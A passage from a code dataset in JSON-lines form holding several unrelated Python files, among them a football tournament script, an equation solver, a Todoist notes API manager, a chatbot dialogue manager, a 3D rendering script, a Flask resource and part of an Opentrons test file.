\"))\n score_team4 = int(input(f\"Enter a score of {team[6]}: \"))\n if score_team3 > score_team4:\n print(f\"{team[1]}, you are through to the semi finals..\".title())\n self.winners.append(team[1].title())\n else:\n print(f\"{team[6]}, you are through to the semi finals..\".title())\n self.winners.append(team[6].title())\n score_team5 = int(input(f\"Enter a score of {team[2]}: \"))\n score_team6 = int(input(f\"Enter a score of {team[5]}: \"))\n if score_team5 > score_team6:\n print(f\"{team[2]}, you are through to the semi finals..\".title())\n self.winners.append(team[2].title())\n else:\n print(f\"{team[5]}, you are through to the semi finals..\")\n self.winners.append(team[5].title())\n score_team7 = int(input(f\"Enter a score of {team[3]}: \"))\n score_team8 = int(input(f\"Enter a score of {team[4]}: \"))\n if score_team7 > score_team8:\n print(f\"{team[3]}, you are through to the semi finals..\")\n self.winners.append(team[3].title())\n else:\n print(f\"{team[4]}, you are through to the semi finals..\")\n self.winners.append(team[4].title())\n\n print(f\"Following teams has gone through the next stage: \")\n print(self.winners)\n\n if play_game == \"exit\":\n print(\"Goodbye\")\n\n def semi_final(self):\n print(\"\\n\")\n print(f\"Welcome to the stage of Semi finals...\")\n print(f\"Team's of the semi finals are: \")\n semi_draw = self.winners\n print(f\"{semi_draw}\".upper())\n print(\"Draw of the semi finals are as follows: \")\n semi_1 = (f\"{self.winners[0]} vs {self.winners[1]}\")\n semi_2 = (f\"{self.winners[2]} vs {self.winners[3]}\")\n print(semi_1)\n print(semi_2)\n semi_score = int(input(f\"Please enter the score of {self.winners[0]}: \"))\n semi_score_1 = int(input(f\"Please enter the score of {self.winners[1]}: \"))\n if semi_score > semi_score_1:\n print(f\"{self.winners[0]}, Congratulation you are in the final\")\n self.final_team.append(self.winners[0])\n else:\n print(f\"{self.winners[1]}, Congratulations you are going through to the final\")\n self.final_team.append(self.winners[1])\n semi_final_team_2 = int(input(f\"Enter the score of {self.winners[2]}: \"))\n semi_final_team_2_1 = int(input(f\"Enter the score of {self.winners[3]}: \"))\n if semi_final_team_2 > semi_final_team_2_1:\n print(f\"{self.winners[2]}, congrats you are in the final\")\n self.final_team.append(self.winners[2])\n else:\n print(f\"{self.winners[3]}, congrats you are in the final\")\n self.final_team.append(self.winners[3])\n print(\"Teams for the final of champions league is: \")\n for team in self.final_team:\n print(team)\n\n\n def final(self):\n print(\"\\n\")\n print(\"Welcome to Munich, for the final's of Champions League 2020\")\n final_team_1 = int(input(f\"Enter the score of {self.final_team[0]}: \"))\n final_team_2 = int(input(f\"Enter the score of {self.final_team[1]}: \"))\n if final_team_1 > final_team_2:\n print(f\"Massive Congratualtions to {self.final_team[0]} for winning it..\")\n else:\n print(f\"Huge Congratulations to {self.final_team[1]} for winning it first time..\")\n\nchampions_league = Football()\nchampions_league.team_list()\nchampions_league.semi_final()\nchampions_league.final()","repo_name":"fabchirag/champions_league","sub_path":"champions_league.py","file_name":"champions_league.py","file_ext":"py","file_size_in_byte":5259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"35842548445","text":"import igraph as ig\nimport numpy as np\nfrom random import random\n\n\nclass BaseItem:\n def __init__(self):\n self.vars = []\n self.equations = {}\n self.matched = {}\n self.silent = False\n\n def finish_init(self, **kwargs):\n if \"silent\" in kwargs:\n self.silent = kwargs.pop(\"silent\")\n self.matched = {k: kwargs[k] for k in self.vars if k in kwargs}\n\n \"\"\"self.solve_graph.add_vertices(len(self.vars))\n self.solve_graph.vs[\"names\"] = self.vars\n for identity, equation in self.equations.items():\n target_index = self.vars.index(identity[0])\n print(identity)\n for item in list(identity[1]):\n if item == identity[0]:\n continue\n self.solve_graph.add_edge(target_index, self.vars.index(item))\n self.solve_graph.es[-1][\"identity\"] = identity\n\n print(self.solve_graph.get_all_simple_paths(3, 1))\n print(self.solve_graph.vs[\"names\"])\"\"\"\n\n if not self.silent:\n print(\"-\"*20)\n print(f\"Created {self}\")\n\n def __repr__(self):\n return f\"{self.__class__.__name__}({', '.join([f'{q}: {v}' for q, v in self.matched.items()])})\"\n\n def solve(self, target):\n knowns = set([k for k in self.matched])\n\n equations = {identity: (frozenset([i for i in identity if i not in knowns]), equation) for identity, equation in self.equations.items()}\n\n solve_list = []\n while target not in knowns: # This section does not pass test 2. Keys need to be the full io of the function\n print(knowns)\n viewed_pairs = {}\n clear_list = []\n\n for header, group in equations.items():\n unknowns, equation = group\n eq_knowns = frozenset([f for f in header if f in knowns])\n if eq_knowns.issubset(knowns) and eq_knowns:\n solve_list.append((eq_knowns, unknowns, equation))\n clear_list.append(header)\n\n for item in clear_list:\n knowns = knowns.union(equations[item][0])\n equations.pop(item)\n\n for item in equations:\n equations[item] = (frozenset([i for i in item if i not in knowns]), equations[item][1])\n\n solve_nodes = set()\n solve_edges = {}\n\n for start, end, item in solve_list:\n solve_nodes.add(start)\n solve_nodes.add(end)\n if end not in solve_edges:\n solve_edges[end] = [(start, item)]\n else:\n solve_edges[end].append((start, item))\n\n solve_nodes = list(solve_nodes)\n #print(solve_nodes, solve_edges)\n\n # Find a valid start and end candidate\n start_candidates = []\n end_candidates = []\n knowns = [k for k in self.matched]\n for end, starts in solve_edges.items():\n for start, _ in starts:\n if start.issubset(knowns):\n start_candidates += (start, end)\n if target in end:\n end_candidates.append(end)\n\n assert start_candidates\n assert end_candidates\n\n graph = ig.Graph()\n graph.add_vertices(len(solve_nodes))\n for end, starts in solve_edges.items():\n for start, _ in starts:\n graph.add_edge(solve_nodes.index(start), solve_nodes.index(end))\n\n # Use the edge dict and find a path\n path = graph.get_shortest_paths(v=solve_nodes.index(start_candidates[0]),\n to=solve_nodes.index(end_candidates[0]))\n path = path[0]\n\n # Hand off each step to the solver\n cached_results = self.matched.copy()\n current_node = path[0]\n for step in path[1:]: # be careful, this is not really tested\n eq = [v[1] for v in solve_edges[solve_nodes[step]]] # Get equation from step , if v[0] == solve_nodes[current_node]\n print(eq[0])\n if type(eq[0]) == tuple:\n cached_results[list(solve_nodes[step])[0]] = self.object_iterative_solve([eq[0][0], eq[0][2]], eq[0][1], cached_results)\n else:\n cached_results.update(self.iterative_solve(eq, solve_nodes[step], cached_results))\n current_node = step\n return cached_results[target]\n\n\n\n\n\n\n \"\"\" for identity, group in equations.items():\n unknowns, equation = group\n print(identity, unknowns)\n if unknowns not in viewed_pairs:\n viewed_pairs[unknowns] = []\n viewed_pairs[unknowns].append((identity, equation))\n if len(unknowns) == len(viewed_pairs[unknowns]):\n clear_list += viewed_pairs[unknowns]\n solve_bindings[unknowns] = viewed_pairs[unknowns]\n [equations.pop(c[0]) for c in clear_list]\n for v in solve_bindings:\n knowns = knowns.union(v)\n equations = {identity: (frozenset([i for i in identity if i not in knowns]), equation[1]) for identity, equation in equations.items()}\n\"\"\"\n \"\"\"for header, group in solve_bindings.items():\n solve_bindings[header] = [frozenset([v for i in [list(g[0]) for g in group] for v in i]), group]\n\n print(solve_bindings)\n\n unique_values = list(set([a for b in [[header, frozenset([g for g in group[0] if g not in header])] for header, group in solve_bindings.items()] for a in b])) # Demon comprehension -> collects a list of all unique groups of variables\n print(unique_values)\n\n graph = ig.Graph()\n graph.add_vertices(len(unique_values))\n for header, group in solve_bindings.items():\n graph.add_edge(unique_values.index(header), unique_values.index(frozenset([g for g in group[0] if g not in header])))\n\n start_node_candidates = [node for node in unique_values if node.issubset(set(self.matched.keys()))]\n\n target_node_candidates = [node for node in unique_values if target in node]\n assert target_node_candidates\n assert start_node_candidates\n\n start_node = start_node_candidates[0]\n target_node = target_node_candidates[0]\n path = graph.get_shortest_paths(v=unique_values.index(start_node), to=unique_values.index(target_node))\n assert path\n path = [unique_values[p] for p in path[0]]\n print(path)\n\n current = path.pop(0)\n result = []\n while path:\n item = path.pop(0)\n print(current, item)\n current = item\"\"\"\n\n\n def object_iterative_solve(self, equation, intermediates, knowns=None):\n if not equation:\n print(\"Equations not provided\")\n return knowns\n knowns = self.matched if knowns is None else knowns\n\n output = {t: random() for t in intermediates}\n\n temps = knowns.copy()\n for q in range(100): # Multidimensional newtons method\n temps.update(output)\n base_obj = equation[0](temps)\n fx = [e(base_obj, temps) for e in equation[1]]\n fx = np.matrix(fx).T\n\n dx = [[(e(equation[0]({**temps, **{t: temps[t] + 0.001}}), {**temps, **{t: temps[t] + 0.001}}) -\n e(equation[0]({**temps, **{t: temps[t] - 0.001}}), {**temps, **{t: temps[t] - 0.001}}))/0.002\n for t in intermediates] for e in equation[1]]\n dx = np.matrix(dx)\n\n # a non invertible matrix could be improper equation selection or the derivative == 0 prematurely\n output_vec = np.matrix(list(output.values())) - np.dot(np.linalg.inv(dx), fx).T\n output = {t: output_vec.item(0, i) for i, t in enumerate(intermediates)}\n\n if not q % 50 and not self.silent:\n print(f\"Iter {q}: x={output}, \\nf={fx}, \\nd={dx}\\n\")\n if not self.silent:\n print(f\"Iter {q + 1}: x={output}, \\nf={fx}, \\nd={dx}\\n\")\n print(\"-\"*20)\n temps.update(output)\n return equation[0](temps)\n\n def iterative_solve(self, equation, target_name, knowns=None):\n if not equation:\n print(\"Equations not provided\")\n return knowns\n knowns = self.matched if knowns is None else knowns\n if target_name in set(knowns):\n return {v: knowns[v] for v in target_name}\n\n output = {t: random() for t in target_name}\n\n temps = knowns.copy()\n for q in range(100): # Multidimensional newtons method\n temps.update(output)\n fx = [e(temps) for e in equation]\n fx = np.matrix(fx).T\n\n dx = [[(e({**temps, **{t: temps[t] + 0.001}}) - e({**temps, **{t: temps[t] - 0.001}}))/0.002 for t in target_name] for e in equation]\n dx = np.matrix(dx)\n\n # a non invertible matrix could be improper equation selection or the derivative == 0 prematurely\n output_vec = np.matrix(list(output.values())) - np.dot(np.linalg.inv(dx), fx).T\n output = {t: output_vec.item(0, i) for i, t in enumerate(target_name)}\n\n if not q % 50 and not self.silent:\n print(f\"Iter {q + 1}: x={output}, \\nf={fx}, \\nd={dx}\\n\")\n if not self.silent:\n print(f\"Iter {q + 1}: x={output}, \\nf={fx}, \\nd={dx}\\n\")\n print(\"-\"*20)\n return {t: round(v, 6) for t, v in output.items()}\n\n def __getattr__(self, item):\n if item not in self.vars:\n raise AttributeError(f\"{self.__class__.__name__} does not recognise {item}\")\n if item in self.matched:\n return self.matched[item]\n return self.solve(item)\n\n def get_base_template(self):\n return(\"\"\"super().__init__()\n self.vars = [\"x\", \"y\", \"mag\", \"angle\"]\n self.equations = {frozenset([\"x\", \"y\", \"mag\"]): (lambda i: (i[\"x\"] ** 2 + i[\"y\"] ** 2) ** 0.5 - i[\"mag\"]),\n frozenset([\"x\", \"angle\", \"mag\"]): (lambda i: (i[\"x\"] / math.cos(math.radians(i[\"angle\"]))) - i[\"mag\"]),\n frozenset([\"y\", \"angle\", \"mag\"]): (lambda i: (i[\"y\"] / math.sin(math.radians(i[\"angle\"]))) - i[\"mag\"])}\n\n self.finish_init(**kwargs)\"\"\")","repo_name":"deltaqyto/intelligent_calculator_v2","sub_path":"baseitem.py","file_name":"baseitem.py","file_ext":"py","file_size_in_byte":10224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"29928919611","text":"# -*- coding: utf-8 -*-\nfrom .. import models\nfrom .generic import AllMixin, GetByIdMixin, Manager, SyncMixin\n\n\nclass GenericNotesManager(Manager, AllMixin, GetByIdMixin, SyncMixin):\n\n object_type = \"note\"\n\n def update(self, note_id, **kwargs):\n \"\"\"\n Updates an note remotely.\n \"\"\"\n args = {\"id\": note_id}\n args.update(kwargs)\n cmd = {\n \"type\": \"note_update\",\n \"uuid\": self.api.generate_uuid(),\n \"args\": args,\n }\n self.queue.append(cmd)\n\n def delete(self, note_id):\n \"\"\"\n Deletes an note remotely.\n \"\"\"\n cmd = {\n \"type\": \"note_delete\",\n \"uuid\": self.api.generate_uuid(),\n \"args\": {\"id\": note_id},\n }\n self.queue.append(cmd)\n\n\nclass NotesManager(GenericNotesManager):\n\n state_name = \"notes\"\n\n def add(self, item_id, content, **kwargs):\n \"\"\"\n Creates a local item note object.\n \"\"\"\n obj = models.Note({\"item_id\": item_id, \"content\": content}, self.api)\n obj.temp_id = obj[\"id\"] = self.api.generate_uuid()\n obj.data.update(kwargs)\n self.state[self.state_name].append(obj)\n cmd = {\n \"type\": \"note_add\",\n \"temp_id\": obj.temp_id,\n \"uuid\": self.api.generate_uuid(),\n \"args\": {key: obj.data[key] for key in obj.data if key != \"id\"},\n }\n self.queue.append(cmd)\n return obj\n\n def get(self, note_id):\n \"\"\"\n Gets an existing note.\n \"\"\"\n params = {\"token\": self.token, \"note_id\": note_id}\n obj = self.api._get(\"notes/get\", params=params)\n if obj and \"error\" in obj:\n return None\n data = {\"notes\": []}\n if obj.get(\"note\"):\n data[\"notes\"].append(obj.get(\"note\"))\n self.api._update_state(data)\n return obj\n\n\nclass ProjectNotesManager(GenericNotesManager):\n\n state_name = \"project_notes\"\n\n def add(self, project_id, content, **kwargs):\n \"\"\"\n Creates a local project note object.\n \"\"\"\n obj = models.ProjectNote(\n {\"project_id\": project_id, \"content\": content}, self.api\n )\n obj.temp_id = obj[\"id\"] = self.api.generate_uuid()\n obj.data.update(kwargs)\n self.state[self.state_name].append(obj)\n cmd = {\n \"type\": \"note_add\",\n \"temp_id\": obj.temp_id,\n \"uuid\": self.api.generate_uuid(),\n \"args\": {key: obj.data[key] for key in obj.data if key != \"id\"},\n }\n self.queue.append(cmd)\n return obj\n\n def get(self, note_id):\n \"\"\"\n Gets an existing project note.\n \"\"\"\n params = {\"token\": self.token, \"note_id\": note_id}\n obj = self.api._get(\"notes/get\", params=params)\n if obj and \"error\" in obj:\n return None\n data = {\"project_notes\": []}\n if obj.get(\"note\"):\n data[\"project_notes\"].append(obj.get(\"note\"))\n self.api._update_state(data)\n return obj\n","repo_name":"Doist/todoist-python","sub_path":"todoist/managers/notes.py","file_name":"notes.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","stars":546,"dataset":"github-code","pt":"45"} +{"seq_id":"10586116845","text":"import os\nfrom sklearn.metrics.pairwise import pairwise_distances_argmin, cosine_similarity\n\nfrom chatterbot import ChatBot\nfrom chatterbot.trainers import ChatterBotCorpusTrainer, ListTrainer\nfrom chatterbot.response_selection import get_random_response\nfrom chatterbot.comparisons import levenshtein_distance\n\nfrom utils import *\n\n# set to any value to limit the number of threads loaded per programming language\n# (to save memory)\nMAX_TRDS_TO_LOAD = None #150000\n\nclass ThreadRanker(object):\n def __init__(self, paths):\n self.word_embeddings, self.embeddings_dim = load_embeddings(paths['WORD_EMBEDDINGS'])\n self.thread_embeddings_folder = paths['THREAD_EMBEDDINGS_FOLDER']\n\n def __load_embeddings_by_tag(self, tag_name):\n embeddings_path = os.path.join(self.thread_embeddings_folder, tag_name + \".pkl\")\n thread_ids, thread_embeddings = unpickle_file(embeddings_path)\n return thread_ids, thread_embeddings\n\n def get_best_thread(self, question, tag_name):\n \"\"\" Returns id of the most similar thread for the question.\n The search is performed across the threads with a given tag.\n \"\"\"\n thread_ids, thread_embeddings = self.__load_embeddings_by_tag(tag_name)\n \n if MAX_TRDS_TO_LOAD is not None: # sample a predefined number of tags\n indices = range(0, thread_ids.shape[0])\n random_indices_choice = np.random.choice(indices, size=min(len(indices), MAX_TRDS_TO_LOAD), \n replace=False)\n thread_ids = thread_ids[random_indices_choice,]\n thread_embeddings = thread_embeddings[random_indices_choice,]\n\n question_vec = question_to_vec(question, self.word_embeddings, self.embeddings_dim)\n \n min_dist = pairwise_distances_argmin(question_vec.reshape(1, -1), thread_embeddings, axis=1, metric='cosine')\n \n best_thread = min_dist[0]\n \n return thread_ids[best_thread]\n\n\nclass DialogueManager(object):\n def __init__(self, paths):\n print(\"Loading resources...\")\n \n self.intent_recognizer = unpickle_file(paths['INTENT_RECOGNIZER'])\n self.tfidf_vectorizer = unpickle_file(paths['TFIDF_VECTORIZER'])\n \n self.ANSWER_TEMPLATE = \"I think its about {:s}.\\n\" + \\\n \"For this problem this thread might help you: https://stackoverflow.com/questions/{:d} \"\n\n # Goal-oriented part:\n self.tag_classifier = unpickle_file(paths['TAG_CLASSIFIER'])\n self.thread_ranker = ThreadRanker(paths)\n \n # Bot part:\n self.create_chitchat_bot(paths['CHATTERBOT_LISTTRAINDATA'])\n \n\n def create_chitchat_bot(self, list_train_data_path):\n \"\"\"Initializes self.chitchat_bot with some conversational model.\"\"\"\n\n \n self.bot = ChatBot('My ChatBot', logic_adapters=[ \n {\"import_path\": \"chatterbot.logic.BestMatch\",\n 'maximum_similarity_threshold': 0.80,\n \"statement_comparison_function\": levenshtein_distance }\n ], response_selection_method=get_random_response)\n \n trainer = ChatterBotCorpusTrainer(self.bot)\n\n trainer.train( 'chatterbot.corpus.english.greetings',\n 'chatterbot.corpus.english.conversations',\n 'chatterbot.corpus.english.emotion',\n 'chatterbot.corpus.english.ai',\n 'chatterbot.corpus.english.gossip',\n 'chatterbot.corpus.english.humor',\n 'chatterbot.corpus.english.psychology',\n 'chatterbot.corpus.english.science',\n 'chatterbot.corpus.english.trivia',\n 'chatterbot.corpus.english.botprofile')\n \n # Train also on the extra conversations we generated \n data = open(list_train_data_path, encoding='utf-8').read()\n conversations = data.strip().split('\\n')\n trainer2 = ListTrainer(self.bot)\n trainer2.train(conversations)\n \n \n def generate_answer(self, question):\n \"\"\"Combines stackoverflow and chitchat parts using intent recognition.\"\"\"\n \n # Intent recognition\n prepared_question = text_prepare(question)\n features = self.tfidf_vectorizer.transform([prepared_question])\n intent = self.intent_recognizer.predict(features)[0]\n \n # Chit-chat part: \n if intent == 'dialogue': \n # Pass question to chitchat_bot to generate a response. \n response = self.bot.get_response(question)\n response_text = response.text\n return response_text\n \n # Goal-oriented part:\n else: \n # Pass features to tag_classifier to get predictions.\n tag = self.tag_classifier.predict(features)[0]\n \n # Pass prepared_question to thread_ranker to get predictions.\n thread_id = self.thread_ranker.get_best_thread(prepared_question, tag)\n \n return self.ANSWER_TEMPLATE.format(tag, thread_id)\n\n","repo_name":"agnesvanbelle/nlpc","sub_path":"project/dialogue_manager.py","file_name":"dialogue_manager.py","file_ext":"py","file_size_in_byte":5295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"71136018375","text":"import sys, os\nimport pdb\nsys.path.append(os.path.dirname(os.path.dirname(sys.path[0])))\nos.environ[\"PYOPENGL_PLATFORM\"] = \"egl\" #opengl seems to only work with TPU\ncurr_dir = os.path.abspath(os.getcwd())\nsys.path.insert(0,curr_dir)\n\nimport subprocess\nimport imageio\nimport glob\nfrom utils.io import save_vid\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nimport cv2\nimport argparse\nimport trimesh\nfrom nnutils.geom_utils import obj_to_cam, pinhole_cam, obj2cam_np\nimport pyrender\nfrom pyrender import IntrinsicsCamera,Mesh, Node, Scene,OffscreenRenderer\nimport configparser\nimport matplotlib\ncmap = matplotlib.cm.get_cmap('cool')\n\nfrom utils.io import config_to_dataloader, draw_cams\n\n\nparser = argparse.ArgumentParser(description='script to render cameras over epochs')\nparser.add_argument('--testdir', default='',\n help='path to test dir')\nparser.add_argument('--cap_frame', default=-1,type=int,\n help='number of frames to cap')\nparser.add_argument('--first_idx', default=0,type=int,\n help='first frame index to vis')\nparser.add_argument('--last_idx', default=-1,type=int,\n help='last frame index to vis')\nparser.add_argument('--mesh_only', dest='mesh_only',action='store_true',\n help='whether to only render rest mesh')\nargs = parser.parse_args()\n \nimg_size = 1024\n\ndef main():\n # read all the data\n logname = args.testdir.split('/')[-2]\n varlist = [i for i in glob.glob('%s/vars_*.npy'%args.testdir) \\\n if 'latest.npy' not in i]\n varlist = sorted(varlist, \n key=lambda x:int(x.split('/')[-1].split('vars_')[-1].split('.npy')[0]))\n \n # get first index that is used for optimization\n var = np.load(varlist[-1],allow_pickle=True)[()]\n var['rtk'] = var['rtk'][args.first_idx:args.last_idx] \n first_valid_idx = np.linalg.norm(var['rtk'][:,:3,3], 2,-1)>0\n first_valid_idx = np.argmax(first_valid_idx)\n #varlist = varlist[1:]\n if args.cap_frame>-1:\n varlist = varlist[:args.cap_frame]\n size = len(varlist)\n\n mesh_cams = []\n mesh_objs = []\n for var_path in varlist:\n # construct camera mesh\n var = np.load(var_path,allow_pickle=True)[()]\n var['rtk'] = var['rtk'][args.first_idx:args.last_idx] \n mesh_cams.append(draw_cams(var['rtk'][first_valid_idx:]))\n mesh_objs.append(var['mesh_rest'])\n\n frames = []\n # process cameras\n for i in range(size):\n print(i)\n refcam = var['rtk'][first_valid_idx].copy()\n ## median camera trans\n #mtrans = np.median(np.linalg.norm(var['rtk'][first_valid_idx:,:3,3],2,-1)) \n # max camera trans\n mtrans = np.max(np.linalg.norm(var['rtk'][first_valid_idx:,:3,3],2,-1)) \n refcam[:2,3] = 0 # trans xy\n refcam[2,3] = 4*mtrans # depth\n refcam[3,:2] = 4*img_size/2 # fl\n refcam[3,2] = img_size/2\n refcam[3,3] = img_size/2\n vp_rmat = refcam[:3,:3]\n if args.mesh_only: refcam[3,:2] *= 2 # make it appear larger\n else:\n vp_rmat = cv2.Rodrigues(np.asarray([np.pi/2,0,0]))[0].dot(vp_rmat) # bev\n refcam[:3,:3] = vp_rmat\n\n # load vertices\n refmesh = mesh_cams[i]\n refface = torch.Tensor(refmesh.faces[None]).cuda()\n verts = torch.Tensor(refmesh.vertices[None]).cuda()\n\n # render\n Rmat = torch.Tensor(refcam[None,:3,:3]).cuda()\n Tmat = torch.Tensor(refcam[None,:3,3]).cuda()\n ppoint =refcam[3,2:]\n focal = refcam[3,:2]\n\n verts = obj_to_cam(verts, Rmat, Tmat)\n\n\n r = OffscreenRenderer(img_size, img_size)\n colors = refmesh.visual.vertex_colors\n \n scene = Scene(ambient_light=0.4*np.asarray([1.,1.,1.,1.]))\n direc_l = pyrender.DirectionalLight(color=np.ones(3), intensity=6.0)\n colors= np.concatenate([0.6*colors[:,:3].astype(np.uint8), colors[:,3:]],-1) # avoid overexposure\n \n smooth=True\n mesh = trimesh.Trimesh(vertices=np.asarray(verts[0,:,:3].cpu()), faces=np.asarray(refface[0].cpu()),vertex_colors=colors)\n meshr = Mesh.from_trimesh(mesh,smooth=smooth)\n meshr._primitives[0].material.RoughnessFactor=.5\n if not args.mesh_only:\n scene.add_node( Node(mesh=meshr ))\n\n mesh_obj = mesh_objs[i]\n if args.mesh_only:\n # assign gray color\n mesh_obj.visual.vertex_colors[...,:3] = 64\n if len(mesh_obj.vertices)>0:\n mesh_obj.vertices = obj2cam_np(mesh_obj.vertices, Rmat, Tmat)\n mesh_obj=Mesh.from_trimesh(mesh_obj,smooth=smooth)\n mesh_obj._primitives[0].material.RoughnessFactor=1.\n scene.add_node( Node(mesh=mesh_obj))\n\n cam = IntrinsicsCamera(\n focal[0],\n focal[0],\n ppoint[0],\n ppoint[1],\n znear=1e-3,zfar=1000)\n cam_pose = -np.eye(4); cam_pose[0,0]=1; cam_pose[-1,-1]=1\n cam_node = scene.add(cam, pose=cam_pose)\n light_pose =np.asarray([[1,0,0,0],[0,0,-1,0],[0,1,0,0],[0,0,0,1]],dtype=float)\n light_pose[:3,:3] = cv2.Rodrigues(np.asarray([np.pi,0,0]))[0]\n direc_l_node = scene.add(direc_l, pose=light_pose)\n color, depth = r.render(scene,flags=pyrender.RenderFlags.SHADOWS_DIRECTIONAL | pyrender.RenderFlags.SKIP_CULL_FACES)\n r.delete()\n \n # save image\n color = color.astype(np.uint8)\n color = cv2.putText(color, 'epoch: %02d'%(i), (30,50), \n cv2.FONT_HERSHEY_SIMPLEX,2, (256,0,0), 2)\n imoutpath = '%s/mesh-cam-%02d.png'%(args.testdir,i)\n cv2.imwrite(imoutpath,color[:,:,::-1] )\n frames.append(color)\n\n save_vid('%s/mesh-cam'%args.testdir, frames, suffix='.gif') \n save_vid('%s/mesh-cam'%args.testdir, frames, suffix='.mp4',upsample_frame=-1)\nif __name__ == '__main__':\n main()\n","repo_name":"facebookresearch/banmo","sub_path":"scripts/visualize/render_root.py","file_name":"render_root.py","file_ext":"py","file_size_in_byte":5921,"program_lang":"python","lang":"en","doc_type":"code","stars":490,"dataset":"github-code","pt":"45"} +{"seq_id":"29767678325","text":"from ..models import Category as CategoryModel\nfrom flask_restful import Resource, request, reqparse\nfrom flask_cors import cross_origin\n\n\nclass Category(Resource):\n parser = reqparse.RequestParser()\n parser.add_argument('title')\n\n @cross_origin()\n def post(self):\n request_data = self.parser.parse_args()\n title = request_data.get('title')\n if not CategoryModel.objects(title=title):\n category = CategoryModel(title=title)\n category.save()\n return {'message': title + ' category created'}\n return {'message': title + \" category already exists\"}\n\n @cross_origin()\n def get(self):\n categories = CategoryModel.objects.all()\n categories_json = [category.json() for category in categories]\n return {'categories': categories_json}\n","repo_name":"menooa25/maktab_53_project_1","sub_path":"resources/category.py","file_name":"category.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"23536191185","text":"\"\"\"Test for the ProtocolEngine-based protocol API core.\"\"\"\nimport inspect\nfrom typing import Optional, Type, cast, Tuple\n\nimport pytest\nfrom decoy import Decoy\n\nfrom opentrons_shared_data.deck.dev_types import DeckDefinitionV3\nfrom opentrons_shared_data.pipette.dev_types import PipetteNameType\nfrom opentrons_shared_data.labware.dev_types import (\n LabwareDefinition as LabwareDefDict,\n LabwareUri,\n)\nfrom opentrons_shared_data.labware.labware_definition import LabwareDefinition\n\nfrom opentrons.types import DeckSlotName, Mount, MountType, Point\nfrom opentrons.hardware_control import SyncHardwareAPI, SynchronousAdapter\nfrom opentrons.hardware_control.modules import AbstractModule\nfrom opentrons.hardware_control.modules.types import (\n ModuleModel,\n TemperatureModuleModel,\n MagneticModuleModel,\n ThermocyclerModuleModel,\n HeaterShakerModuleModel,\n)\nfrom opentrons.protocol_engine import (\n ModuleModel as EngineModuleModel,\n DeckSlotLocation,\n ModuleLocation,\n ModuleDefinition,\n LabwareMovementStrategy,\n LoadedLabware,\n LoadedModule,\n commands,\n LabwareOffsetVector,\n)\nfrom opentrons.protocol_engine.clients import SyncClient as EngineClient\nfrom opentrons.protocol_engine.types import Liquid as PE_Liquid, HexColor, FlowRates\nfrom opentrons.protocol_engine.errors import LabwareNotLoadedOnModuleError\nfrom opentrons.protocol_engine.state.labware import (\n LabwareLoadParams as EngineLabwareLoadParams,\n)\n\nfrom opentrons.protocol_api.core.labware import LabwareLoadParams\nfrom opentrons.protocol_api.core.engine import (\n deck_conflict,\n ProtocolCore,\n InstrumentCore,\n LabwareCore,\n ModuleCore,\n load_labware_params,\n)\nfrom opentrons.protocol_api._liquid import Liquid\nfrom opentrons.protocol_api.core.engine.exceptions import InvalidModuleLocationError\nfrom opentrons.protocol_api.core.engine.module_core import (\n TemperatureModuleCore,\n MagneticModuleCore,\n ThermocyclerModuleCore,\n HeaterShakerModuleCore,\n)\nfrom opentrons.protocol_api import MAX_SUPPORTED_VERSION\n\nfrom opentrons.protocols.api_support.types import APIVersion\n\n\n@pytest.fixture(autouse=True)\ndef patch_mock_load_labware_params(\n decoy: Decoy, monkeypatch: pytest.MonkeyPatch\n) -> None:\n \"\"\"Mock out point_calculations.py functions.\"\"\"\n for name, func in inspect.getmembers(load_labware_params, inspect.isfunction):\n monkeypatch.setattr(load_labware_params, name, decoy.mock(func=func))\n\n\n@pytest.fixture(autouse=True)\ndef patch_mock_deck_conflict_check(\n decoy: Decoy, monkeypatch: pytest.MonkeyPatch\n) -> None:\n \"\"\"Replace deck_conflict.check() with a mock.\"\"\"\n mock = decoy.mock(func=deck_conflict.check)\n monkeypatch.setattr(deck_conflict, \"check\", mock)\n\n\n@pytest.fixture\ndef mock_engine_client(decoy: Decoy) -> EngineClient:\n \"\"\"Get a mock ProtocolEngine synchronous client.\"\"\"\n return decoy.mock(cls=EngineClient)\n\n\n@pytest.fixture\ndef api_version() -> APIVersion:\n \"\"\"Get an API version to apply to the interface.\"\"\"\n return MAX_SUPPORTED_VERSION\n\n\n@pytest.fixture\ndef mock_sync_module_hardware(decoy: Decoy) -> SynchronousAdapter[AbstractModule]:\n \"\"\"Get a mock synchronous module hardware.\"\"\"\n return decoy.mock(name=\"SynchronousAdapter[AbstractModule]\") # type: ignore[no-any-return]\n\n\n@pytest.fixture\ndef mock_sync_hardware_api(decoy: Decoy) -> SyncHardwareAPI:\n \"\"\"Get a mock hardware API.\"\"\"\n return decoy.mock(cls=SyncHardwareAPI)\n\n\n@pytest.fixture\ndef subject(\n decoy: Decoy,\n mock_engine_client: EngineClient,\n api_version: APIVersion,\n mock_sync_hardware_api: SyncHardwareAPI,\n) -> ProtocolCore:\n \"\"\"Get a ProtocolCore test subject with its dependencies mocked out.\"\"\"\n decoy.when(mock_engine_client.state.labware.get_fixed_trash_id()).then_return(\n \"fixed-trash-123\"\n )\n decoy.when(\n mock_engine_client.state.labware.get_definition(\"fixed-trash-123\")\n ).then_return(\n LabwareDefinition.construct(ordering=[[\"A1\"]]) # type: ignore[call-arg]\n )\n\n return ProtocolCore(\n engine_client=mock_engine_client,\n api_version=api_version,\n sync_hardware=mock_sync_hardware_api,\n )\n\n\n@pytest.mark.parametrize(\"api_version\", [APIVersion(2, 3)])\ndef test_api_version(\n decoy: Decoy, subject: ProtocolCore, api_version: APIVersion\n) -> None:\n \"\"\"Should return the protocol version.\"\"\"\n assert subject.api_version == api_version\n\n\ndef test_fixed_trash(subject: ProtocolCore) -> None:\n \"\"\"It should have a single labware core for the fixed trash.\"\"\"\n result = subject.fixed_trash\n\n assert isinstance(result, LabwareCore)\n assert result.labware_id == \"fixed-trash-123\"\n assert subject.get_labware_cores() == [result]\n\n # verify it's the same core every time\n assert subject.fixed_trash is result\n\n\ndef 